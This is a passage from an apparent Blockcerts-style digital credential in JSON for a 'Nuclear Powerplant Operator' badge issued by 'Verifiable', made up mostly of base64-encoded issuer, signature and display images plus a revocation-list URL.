JMH394++vLuPiKoTkDz3H6lgG1sNpfDGFiYN8QSpVM1WcWOgOe9+Qnbnp77zo4r6KyggA9g8mn72cDjLThZQUHSCiNfWe394buWVy4uSIKPClOe2oDgty8HxxKo0Jipeq8Av4AEAkRCn02wwiF9/af33v9pYXeqc8isd29uju98dbu9O4liYLMuPSyPfQ71H0kjAW54AjxMGLDHhDtb4SXV3Wzv3+2uVyhIgFjicyU8eHm8fTzPZItzPSESUxOLG+cE/vrR2fb0nBGa+qdNgEa04Xs/y9cMqjZHVDHcpodeJX39x7Q+vbVy7MMgPvpyECAAElEn64pv9b+8fZUTo2UhtfvaiiQrkOr/r43gLAJbjDTn1BCkzRnLq7iUaBLHAjOD+4ezOg+HhOIOTC3gkgG4iXrg4+JdXN66u9SrnJlVRtT41o40S38ql4Hkn53WCbiJee2ntn3978cbFBfJdOuFL+SdCScLuweTTr/c298bdRJB+40B9I6zHevbKVwLQVEU0K9jcaWNffGgSm1HJAuynY/dqrUemxFTiOVzyqFQi+vDe0ebhNH94Mi0+bz6J8JUrC//t9XMvX1qQkjIgoX7BS9Uo0H8Hk/YKgX6NVNDY4j6Vqu06IQJiOqNBJ/rtK+v/yx8vX1rvsWemmyYCRJjOsg8/3Xnw4DibkeA0Il7AVzRhkWLrs4BqJAJt3BURrt0K73LLuHtsfchlngnzy84IAAwDscC3+ohPHo5nZfNBuX80++TR8cogvrjUIYITCbi8R+zE+PyFQTcSy4P4vbsHk1QmAoVAClvD1iQl7SdqGax5ms0C1BGI5alaKm+FSyVNZ/L8avc3L6398dWNjZWuEOa9fc0TESFimtHmzvjjv+4ejdI4xlINUz/ai/lRVW1oNAKgeQWNsdrmEQ1lk0w79issoRV+0ahqE98C6Sdl9wo6nay5H50jB0NlQsxAfvpweGGxszZIklMYannzvUQ8e6HfTUQ/Fre/O3x8PMuAYoEISDmc+SwFCoBXsjkRW+rgeCdwiAAkaZbJSOCta4tvPL/62rMrF9Z7BCfn9SodHE7/8unO1tYQJEWRL2BYmbo2Q5fFLrKUHM+XGtddkSUzqmnPXvfr7LT+/VOzOyrz1OJ48EvqktpJhI+OZnceDa8sd54718/nyslGHwGIKBb4zEZvtRctdKKP7x0+PJhOZxKBhCiHWJXYxma+ZyRYbqir6YuY+kuAJJAZAcLiIH7m/OD3r66/eGN5oRdTvu1wYjMdABAnk+zbe4cffbYjM16Nsd9yxp5pOJaVqspULxtMqbmMl4u/Rb1K2tRTzhDnxEH107M7OFinomxOGpNjNNGYK9hf7YxWe9HF5U4/iTT9oS04uV1FsLyQ
/MvrG9c3eu9+vf/5g+PRJMvvmeUmqIIL6CNdIaK6npstC8WExsKURIS1pc6vnlv5w682Lqz24ghzPeQ0tCciILh3/+j2Zzs7h9NOIvI1RAPDgA0KAW06nIISF4qBU5wrnMLjWVnUCeBUYHSwdVaJ3vrf/8/T0GtOyemew1CFnBtigeNUDmeyF4tLS52k/EzFyQHCYkd9dSG5ttE7v9yZZvR4OBtnEhCj6mJ/n5PR3GYyYQpsSRb+bpKUptTvRq/eWP7nNy/8/tWN1cWOEIAn+Py3kvKtCgQ8OJy9e3v7gzs7kcgVJuWCFu9pQzTwMexL7pX6Sf19ZvcrVZtO87cU8FoXPqP5CZDu4LRZoRSUaNtzYFYTEe6Os3e+PTg/SJ471+vE4pQabf5uEuG5xWTQWbq82v3i4fHn947u7Y6PJlkE2ImK84QkyanSVFlD43cJJ1EIc5lSmkqBsLKYPHdl8eUby9cvDNaXOr1uBKdYuwzKpqn84JPtO1/uzlLZSQR/35VlWVUN+FVNv5tMaTIo0Q3hXYNk6vFMZY1zngx2Z6mjUoHVBRU0iEAgSkkPDqZv393vd8Qza925fMCMAATiYjda7PbXBsm1le4326O7O+PN/cnhcDZJgYAEQKKdQa7mrYYVowBoD0hKyDIiSSip143Or3QvrXefvbxw49LilfP9biKg0n5Ph1kuCNKU7ny599Gdne29SRILc/WvKe/keFMhYe1Ll5xqYdGGHAPmhNEBVio8MezOEKBW9XhHjYVn7jH8y6Ph+cVkoSPOLXZO77IopDMBAKwO4tXB0s0Lg+8fj+9ujb7bHm4fzg7H6WQqpSQpJQAgAQIo9h6q54M1bgCQufJMAET5CpYkYjGJlnrRpfP96+f7Ny4Mrp7r50dFC/VjHnMYEWapvL81+vOHmw93xoCgOVsZk9HNjizHm/al0w3lNABYjg+xiq8CADxh7M45qszzAb6FDwEQcZbR+98fLXSiP92Mep3o9BwPqiscYaEbvXRp4YWLg/3hyr2d0d2t0b3H4+3D6XCUphllRKqvjPSYJqpnLiFRfldlhCgAe10cDJILq71nz/evXRhcPdcbdKN8qZdEhZ4+l/WKiAg2dyf/fnvry+8PiaiTCCnJq34wZV5QbB+iXsLupRiVNT0QapmtZ2stGBEd+zNV9kli94oQSFAFWZeEqDnIveuUEyGJcGecvvvNQULw9y+s5rftzYFNdGYTiKsL8WJv8flLC+OZ3DmaPjqYbh/Otg8mu/vT4TgdScpmMs1kKnWVBUAgdBD7iL1OtDhINhaSlbXehbXuheXO6kLSS0QUiViUV5zlN47MKeUzZ2dv/OGdnY8+3SEEgSjJR9VyaLy7TlDKA2BEuDqORqpdigYb6L/sMjUb9lmXMDxJ7O6GsuB4F0q6/QQAkcBHw9mfvz9MEvHbG8tJNDeOrzoEAATsxNiJYdCNlvvx5bXeZCYnMzmeZpNpNprJ40k2mWappJSAZhkQRDHGcRTHop+IQYT9btTrRt1YJJ2o1xHdWETl5XSFaJuL7lImAhKIjw+m//nx9nu3t7I0iwU6JXqDnS9NpfGYjEaDnIZTyGYNXM4f6s+CDoy5lfHEKTMOp3auxDdDkhAixJTgwdHsP+4e9BPx0qWFXn7iYd7wVltacYSLUbTYjaoiKWmcyjTNbyYFSiUACIFRJESEnQhjgeyeDinW6LwALqhFsHs4/c9Ptj/6/PHe4TTpiJaboJYJaG7mNzUZjSwZpfz6AP6pReoq4eD4J4zdIeCUROfYaMa7JIgjzCR9dzD9t6/3BeLzF/r9TjR3jq9kbz5qOfPnD4XAQSeCBtczVjvIZZjX3GclIIAk2jucffj5znsfb23vTpJOBOXmNTZxofAbScV8UAjLvVw9Y1so7+NTs8BmwWxY4wDGaDbrP3nszgJr+nptb5dOTQSZB5Ahfr4zBtiTRC9fXji9M94JrmVIVmQ35CEqf8rNnDMASIOEcrn+l7/t/dt7
j46OZ3EiNHJBKR0NjieLyI59VrRL3RqFVlpRz+VVNFUmtxHMOlL19ESyu83BqnZu7DoZrynkzn2YnVj8bXcy+dveaCp/9+xyLPCMON5EohZ3Z9+ZIxHk98bgzt74vc92/uOjrckk1Y47KQF5DJRBIldPAm+F4QR2w6gmpZfjsQykAd3wtVatJ/54h0pENALHlR+giyKdmIhw73D6/329//98/vholJZexXZD8tQlKnYA8Iet0f/4aOvPH28Px6l264lBKPY4aUFz+7iQ0k25s+C80lEdL2MQ4UTeVdOVUyOFAJ6DbU+kdK8g5zR41H569bxSKEQIqYQHR9Pxt1Jm9Ob1pYsrHVEeWfrJZO+ZJSr5Ks3omx+O3rvz+M43+3uH066tw0At4J1kBEvWsuZmKWJ5IW2qOn6/p6X/2ALe2MmqnJKGn0cX8E8yu4OL45W1L8TxgAAkCWIBknBnlP7bNwcjSX93dfHqSreXPKmL22mpBkR0PEq/fXD854+3v/jucDLNup0IIN/QsB0sNcs4yMj0oOS0+pTHz/kjC7iWNJXGz/GgY8Fu1nJ+niec3cEeG2tzT3FBMdslhVDJr7HtxuI4k/9292DnePbWM8vPX+j3EoFnbiv+eCmXs5mEg6Pp51/v//n21g87YxDQSURxUJTdoWxrX3K7TnxcAPNyDSiPQj3rWE+OByQdAGaNepK3mVy7a1XMtH/Tzdqgzu02IRCJPtscbh7Nfru78Meby6sLSb30PbV8XzhCEUnCvUfH736688lX+6PhTMRl/L6LvqXwQyqvEGddHMFAmvIhuXyC6rv2LqwFF2cWG3WsN8uwggojo80nmN2Bkzpl0jzort07R5OAKCVtHc/e/v5w83j25rWlW+f7C3lg7UnvJPsJE5URNYS4dzT7y5d7n3y1d39rOBpnKFDYIoCR5Y59TXCIWLaMPZzaIGyrrpz/S0rIkW8LLEfeUGnqbO0ZVmB4stkdlBEC01pSRJFj984lqAAigUS0N8n+8nC4O0ofHkxfutC/stpNqtjDJ96ErYDMp+fhMP320fHn3x1+8e3B9v6EMoqFEn3k36FUtGdm2XQalJaAZ8IKzDXEdyZdwUvbYGki743kWPmfeHYHn1BgON6/FitvCsRIwCylv26Nto9mDw8mr1xeuL7WWx/EnfLbLHPfhZ1LMtzkw3G6dTj9+oejz77e/+r+UTqjJMY4FkS2CACekbExx5tZi//yA1GV8zu4triW4objyKbKDU/m8D0N7J5jgGBtUAKoHEn8ey5bngiIKEaIE3E4zf7z3tHnW6PXryy8eWXxykq31xH5CcAnTbmpdHQpaZbK40n29Q9H//PLvbv3jyajNImw2xHFPqqBskEQPlLA3tHkyd4EToefB2uz0i3I0G7HKDZWGGBmIFpv4f/x37894wGaUyoWOYX0qrO4WJH1FbGq480Wrk4CJAKCtV508/zg1SsLL270B71IlDGDuXL7U3E+VXufmINJj/enf713+PHdg3uPhuNxVktZBSmTYlBSiZxZVO+AqIJhVLqRTuSK7FovpQLNvmIC4BgX4wnXPgOA3oUBwNMi3TVqFcmMLmqg0rmtq9yZkBI9nmRHD47u7Y7vrHSfPde/eb5/YamTRPVuZBWMfLa8X3xRKL92tz6GPZ5md7fH3z06/vb+8f3t0cEwlVIiQREezxCCCWP00MTWeF23IzVCgo/4cLjMdW+yKdft5QhY7UhTbg0Anh52r+xu4Hb43KZPKIuEVPkB8tssRjM5nEx2j2ff703+tj28stq7tNK5vNRZ7cdJLNTI3EK1UNbtEyeq/i/DzdTN8dEk29mfbO2OH+1OvtkebT0eHxzNJqmMBOb3jBSHAEvsTOeGy2Vu0w0Qyss+3FRVVPZqF4kjsq1O8M5lF02qRgK+B7s1Mht5SraZDKTcsspv+7vIUlKkVGkIAeJYANEso+/3Jz/sTwYPhxeXO89v9K8udzYWO4v9qN+J+omIhPNAXUNd
F43fqD2bzuR4mo2m2d4w3dyb3Ht4/MOj4c7R9HgiESiJsNcRhfJiMhyCdtuWXspzvOHja3bJmXeXCu2WwcPnzoLSevbbrIFu8kaeKnYHRZbY5LAxNRZKjzetZABVQUGBvUgA0Xgmv9oc3t0aLcbiwnLn6lrv2nr3ykp3dZDExSkNyD8hIOotnYYBaFi5hglISpCSMkkZ0fEo29mfPNodP9yd3N0e7RxMJ5M0IogT7HSjwtAG3WmqdekQtirHu3WeQldr7hLhnO5UqZrBXSfWY1PBwjo61azhg6+zkJ95r9542tg9T0LxFqsRTmwgTT0AXm8am4gAIIowEgIkjDK6uzv5bn/S+R4Xkmh5Ibm4mFxY6pxfStb6yVI3GvSiOEKoo/7CiQgk0WSaHc/k0TDd25882ptsDtPN3fH+0WwyzaQsAg07nag06chkneqXrr8Wehq/B+nw0lTzX7VqyH7Fq+GoCDqduc4wL9PCaugRdswitaWnkN2ZHQTFZvU7d73KqCuar9jvwEKYZpJGGU2m2d5w9mAHu7HoJaLfEYudeNCP+zEOYrHQTzox9mLRiVEIBMRYYCZzDZtmqRylcprSLKPJJB0dzUaz7HCcHY/S8Tgbz7JxSqnMv5xD+d1eaLjDbWlqR4MCN4u1faWS4YysQSXGemWpyo0LlGedWAHP8jU34uq8cG5s+ZooRvYpZPcSa5ePxaSQUcEmtP2ELAFVthGVxhxIkJKGKR1NMgAQCLHAKBIRQEdgtxMlAjsRxlFxIDUSKDMJBESUZTTJKJWUZjSbZdNxRkTTjLJMgsyNVBQRllYxFreUmcpAIzPdvGRTQ9nOcpug6hwziMMq0Bw7Mvq3y9NvqUx5LfRwtWt3xco+pexuqYOgK4sMSWxa2xyvNYVqX9XAKAMpIhTVUWwikJSm2UTCsSQ6mhWCUQVQuVsvZ5zqd36LfCQiUXuiS23CuO2IxajJquVC2SWbK8xMfaaVyeitH+parU/s9LC5wuGUzB8/tewO/HqtuisD1OQ8dJVTsrRZHRdLVEndQEEUAFEEIhY1b0iHH4lAkiwViSKyhQDqb+6wdkX4qLL3IePMtSYAp9CbHK+WGqQGtzfGpV+pPkt1SQENAAWS0FkQNwWezvMNLrOF/RxxsCFHrTw6si5F3eeITEuASIgZkSSSkqQkCSCBJJCk8r8ygXSPUPmX9GzeBZMFK6s/VpYqXVdmKmtnaytXFc+ljlFgkVL8SBYZDUgMLFzHfvkhAG5YizefTnZXcUOmhNCqVmQNXtFJgwDKp9nLCHA/GFb3+ivkMAO8nnllsFHZqzGQRYsbDJCcrGOizBGq+JtLU1QquoDlmc8GiYW5gd9FI5sLZX+DT+7R7CYpHwGb3/K/fnoag2TwpMrxRmVGwPvYC43KvOwJZJt+RNMl8gGBUfqaZglazig3eE3muKPUWp48HG+gWw8TPs3sDpZMAq/Y8Ikfs8D5bVe7IbsddWxsTmXWJe4LhO3En8VwrcVngOPJVBQdKPPCW2vK0ZV+2QE6MPKvIYZ0sVaep5zdKzJx5CWW9K6R0GaOTjZ087fdpr3auK6acCknRiv2AHt0XxdSqp5WqSbGxPNnDSDDC44+Liyz2jiyHG8Rm9Q1x6fBm4R6+tndVipPYgmhKV0UJb6o45c9JlTWSATELa9rVv+aXwhmFo3QEydbKGT0ZZUIi5BBydBc75cQGincbW+kCQmCp5/dKzxb8FbTxH9xneeb8im3B6ntjzSRnVWNijlYL40Bj78UwJzDEGQ4S6VR92RtOptSgC+tIwIcPhz/QypHOyDggZm0Pwt2rxjO5Q0IZ4HPsh25KrhEkXOuBeekt0JDd4T12OT4VqtOeA0x5Gtw4XXMEC9yZBtXPrL8rHR3lQhqjsxHrpFzCkXOZgUu65QuDRg6aLNqGDazQ0I4knOSk13ZyuqzmojJguNdqKUSOb1nXqsXG0xpdPrnf07s7lw66woBsR3gngZOSWeWyle4nSO9
Kpt1GpToy4aTrXs1VvwasiN7HkCdMkFby9Wjh+YGueBp32YyUkUIFSEsLgjTw1/c0pc113Q3vNVv68FG/3KfPxWWyC9/kgkhR4QGWcVtpdBEZ47av6FL9Hw7wtTgVaoi+uaweh7MnjN+FUh/Qlg4SS2C8MrQz4XddazUVO86eRRu0t/WZINF+iC3qayjhENpdt58bGkFhRYVGiv9jkR2tonRqXM81f5EL8x+ia7WV4uI1cqe9m0mDWHrB1fIuwgDw+1wSqoNOnpjpLvxy5hgAdwAbKek3Yt/kTHmcKWya101UBigVNJcpTa2FhnNcfHB4MSRgdV0HBePf0bsDk7WsfUJ5qlvHTSTub8Y2LrCADuGd53syWxfuI6+LDDrknPnuIlS5FDdvW7EIGG9w8bMpfoR2YMCaE+hnxe713hqA0/gDaQxvoNQCT9dnSVNdhg7lG4b0eJgx45gA65R+IwbXScxHM81s8TB8e6sElOAqOsz/Gyx4FG+g8A7xwCcckF9goUjv8mc+tmxu1sRJOsJ87tuhFkBDI73q09OkOoLYZTSyko2LFRuFtQf4W4i4JvQpxEaDFXJ9SYr+U0lSjOaiZ0kAAEcHRTmsz+TbSYjMaxjI29I9PJLOL5X2gDQwEVD9luhRqtqWMp4p1xkW+bmgztYGuoZxWcLLAgc4UlMm7qTXvHB206BVvSGaoXx6o0/R3ZXiGCjXR/hRu97DiZoYbN6SY+gSUetQZ+A1ySifhDDiTrzxMlYtuwMuxR1Qjl6clrAnLQ26oQWMZ6MXPZnyu6szdqW4x1GmTeQJuTQ8GvMABaLBzje6a9wiVsuUaCW16i3V60mdrn1pPbPBpxIPFWpMiHYyvgz22biU9jDWPxhxSGzvoa0YaO8wSdZyGUjWjau8mr5K+cTlwnBm4zeOdzUVC1grk5aMDRoaySg1T5b362X10dn3cd5f77s7hB+WBHFKG+znlbikJhShZ/YKAODVxpjUmeVB2RP1ra7Tn5XotMs1mqZji+/V9Rhb/g24MyHDnUtdwOwe1KI8HOX7hbOJS2c4sLDKzo3F9qzuZ1uS2Ufx6tZhlecKg2aUq2VgAee/xQB79anjaYtfnLO4cCkKi1WT3e2asrNwPyqPKYUAH7m7F4NNidIyMUiZiO2tNNVaSOSxmZx71mnuhUG9AbYVRmP0ex5UmpUoP7rEggeDaf6SK3PLAkJePRo8EpttJvTssSXws8riIBNLMfbRqc+ctpD/VeZs4RTI5uQB4/RrJoiViSyX254mtuJkbeCW1KTpzSg0hj2QEOO59FxrRM/d3b3JlXL1gYjuCOorv6gv2I/8Qt4luPDBis49emGCjRDC5+R4ATd+umM+gIL/oLyOpVaXVhgK36a/81E+RfA7m4B7x2YoLBE54N85JiPXvDZUqEwRFc5VMLRnfqw+vwAuutCaAIggBorgaBxvH9q+XG0RLiLhA3O0LgFvEr2CvBfzDaTN5W8yHhq27gXnAKeleh+J6DhsXaxt1eRIOC6aKlomcHSQaNZpxsaofBqU2Tp1fa0KcNgTKKBa8rxM0SJtf7ZbzMZyRbwajBdUHA3z/qlHYBf/iFZoQ12Ty5oq0LvMmBmWX1a8wkG5auJkRWNx2mJDdMJLaKiR1SfIMDP2e9ukqD86+P4k1DXjDwL6LvGy7rS7gplcykD/q4aZv2BZY2NVBNmV+VmJ8qrR6EdX0cLjnn1i2F3UJRRfWhL1bl+AhAaqjqLAI64YqeZa0m7kssdx4L8YQVahgk7O8GJcpUgYHF8BYOdrciTn5n0X3DnMhLK3vlD8UVlYyBCKJSN/JLY3ZG8foAmokjhNv57XQ4BxU2h4kJnsIbQp09rlQmQ/CbjCU7cgpOlWA2nYvTA4Q9nm7VVw1icfp1KnySGJPqFsbtDwOfJETfiFSSovVtvsvKOCxYeM7k3Jh3qMtcmObYVGzOcQhBiKwedNsbuW5sZBQBNrPZmZFOPCP/C2J1NtgjyW5wO/1rF
8cgqM8BljTYNF41Ln66aMjQcrbCpG1SDzDAS/DCHcAscQg+aJZ5ISQMLBL+ShqVp9Mtk96BlE+J4j7+ieF2v0DysIMgNTgFfw2wyDqvD+FWs8hfvomlM2Op1bd+3FcerFxa4gn+qUk5tU9v75bF7RYjAEsn5QAL6q7/fZtzma9YtgPUnZPjgjU7RmzUJZWWxcbYEBqr54o/AazqpHNjz1ZDK62jgl8juCiHMO5jmvuvUcHo4bFYC+8oxa84Itqkix4fCerLcIkb2BHP6Q/TbXTzRoDrZnWZA+RCrqL7mu05WI/QLZXevAs2M7onbNTi+jYDX2NstO51ZbMYNfqugErdGlu0bqzd5lcZ31MiDjz+u2EV2Lou/oG0mI7nkLgC0+LRTSMCDrTUZssfBfPVlEkEj1bJZTaRCk7ZB6JixGQa+rAFYrV81XWHsLAbDmx1IWdlfKrtDOVTYkuPBnzXWB6saerNgcjywtwU1QIxpuc56xWGQmSq6ObO6CEBUKxo4Mh15JZGD8pbXlYzKxXXQv2B2L5Jj4VNL2yo1SiJ7EW9z+IP7DFj1Yt2Ea9KC/1K7Flk88fFtBiPmbdTL0NVM6aJxg+CF8/8HWcjrbwcDxZsAAAAldEVYdGRhdGU6Y3JlYXRlADIwMTgtMDQtMjZUMDI6MDA6MDUrMDA6MDCfmxfiAAAAJXRFWHRkYXRlOm1vZGlmeQAyMDE4LTA0LTI2VDAyOjAwOjA1KzAwOjAw7savXgAAAABJRU5ErkJggg==',
'name': 'Verifiable',
'revocationList': 'https://gist.githubusercontent.com/faustow/07a66855d713409067ff28e10778e2dd/raw/e08bb6d6f1350367d3f6d4f805ab3b1466b584d7/revocation-list-testnet.json',
'type': 'Profile',
'url': 'https://verifiable.com'},
'name': 'Nuclear Powerplant Operator',
'signatureLines': [{
'image': 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAJcAAABVBAMAAAC2kWv1AAAAMFBMVEX///8AAAC/v79/f39fX1+fn5/f398/Pz8fHx/Dw8NTU1Onp6cvLy93d3cnJydvb28isqiqAAAACXBIWXMAAA7EAAAOxAGVKw4bAAADQElEQVRYhe2WS27bMBCGp5RIudsCRbasX8iqUJ3Y3hIO7HZJSJayKAqw8StLIYnTLpNFnCv0BL1NT9MLdEhJzkNSEkfaFNAPmKQl6tNwNDMkQK1atV4nyqtjsbPqWODwCmF+hSyIKmTZvELYvEIWXFbIIgJgaUZMlobZwfAiphwHZVnz6/NuPCJRqyyMvE8G7HQpCC8HY1dJvx5Pg7AcCyy5AgihvyDrbkkUqAb0gbwjG26rkijyY9NiETSuaADOawD3Az5siEtLwoFrS5i9BnYRdwxWiqr9ZdQA0ubfOcKY2hFFJI8HCzYEDw6p24aFA4f4JSA3Zslhv5A1lEL3S3BPOkxQz1EjkDZs8JqfZxgb62+dKxYCucK+9ZOFXDiqKxzYULCnoujtU3xDgTc7uBoXf/zYXjB3yrhowWYAbwuDVc+GVcYms0hM6AYH5sL5SlpqfeLJHgwVtHpFsAPdtHVD77HWutVR8UvfpP1P3IE93lFYsjlWjgIW0YbFe4RpkmQx99CZXR/ob5Cjc0SO0BsRMF5cueNANtXTbBRJspirF+i0Hnx1KUQc+lgRW0RgSOBDKh9mls80hwpy+zlMksXowxEHYa1CCREL/jQ5tagEd2tBVkI3li6dTXk9sFtJshjRPfzOkzc3wG48OAM3pDa3tFFFJda4rIE/0lFH4KTJYjTf1y1RzMdZRxBw6iwHW4cUwbTrmzbWvVmaLGbxkzieiGchff/bANjHvypdSJ6autnorcbC1YltsuhnvHixIejaRTS5oYzFBSzQZZy6Oti9UzwrZZMFWXcOjz/jg/uPhVMw2Mc+monJwh4ki37RnSkmwCz1FKxtVjueoJXDRxOpcfj26xn04CkWTPRZkK572R2CjZIJ6f/oOcMwJAcw+6JY9s5BMmF7wU9sLRRzfWgP8qrQnJuOiLu5z+6VvmrLPE/QBGLxZwAPNJO6aGWULHK3XY1Nct1qpfydDijaXZ3s5Wk6mGTvFcuFvFWy6PHgRZK5hm0r4G7+X7JOzvxVZvAyNVXOxW0OjXaD5SqFEVEBLE2JSs79VtLvFBhFSqKl9Akx1kxjWCWGoQIOpPC0tbM6gVcZq1atWrVq1fqP9Q9Wkn4v31JdhQAAAABJRU5ErkJggg==',
'jobTitle': 'University Issuer',
'name': 'Your signature',
'type': ['SignatureLine', 'Extension']}],
'type': 'BadgeClass'},
'displayHtml': '<div class="sc-EHOje kcwAhk" style="font-family: Lato; text-align: left;"> <img src="data:image/png;base64,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
